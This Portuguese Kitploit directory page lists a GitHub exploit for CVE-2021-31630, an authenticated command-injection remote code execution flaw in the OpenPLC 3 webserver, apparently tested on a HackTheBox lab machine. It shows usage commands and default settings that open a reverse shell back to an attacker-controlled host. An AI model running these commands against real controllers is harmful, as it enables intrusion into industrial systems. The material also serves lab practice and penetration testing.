Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-31630 — OpenPLC 3 Servidor Web - Execução Remota de Código Autenticada. | Kitploit
Ferramentas/GitHubGitHub/manuelsantosiglesias/cve-2021-31630
Análise de VulnerabilidadesExploraçãoSegurança SCADA/ICSExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubmanuelsantosiglesias/cve-2021-31630

CVE-2021-31630

OpenPLC 3 Servidor Web - Execução Remota de Código Autenticada.

Ver Repositório
6há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-31630

OpenPLC 3 WebServer Execução Remota de Código Autenticada.

Descrição

A presença de Injeção de Comandos no Open PLC Webserver v3 permite que atacantes remotos executem código arbitrário. Testado apenas na máquina HTB Wifinetictwo.htb.

Encontrei problemas com todos os scripts que exploravam a vulnerabilidade, talvez por estar usando o Parrot ou meu navegador, o Chromium funciona para login, tive problemas de login com o Firefox e algo estranho acontece com o servidor web com a requisição POST para login. Modifiquei o script do thewhiteh4t, há partes (principalmente o método de upload) que são apenas copiadas, mas mudei a parte que obtém os cookies do servidor para lançar o exploit.

O PoC original é fornecido por Fellipe Oliveira

Espero que ajude se você tiver problemas com ele.

Dependências

root@kitploit:~
pip3 install requests

Uso

root@kitploit:~
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx

Alternativamente, você pode modificar o exploit.py

root@kitploit:~
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...

python3 exploit.py http://10.129.x.x:8080 user pass
Baixar ferramenta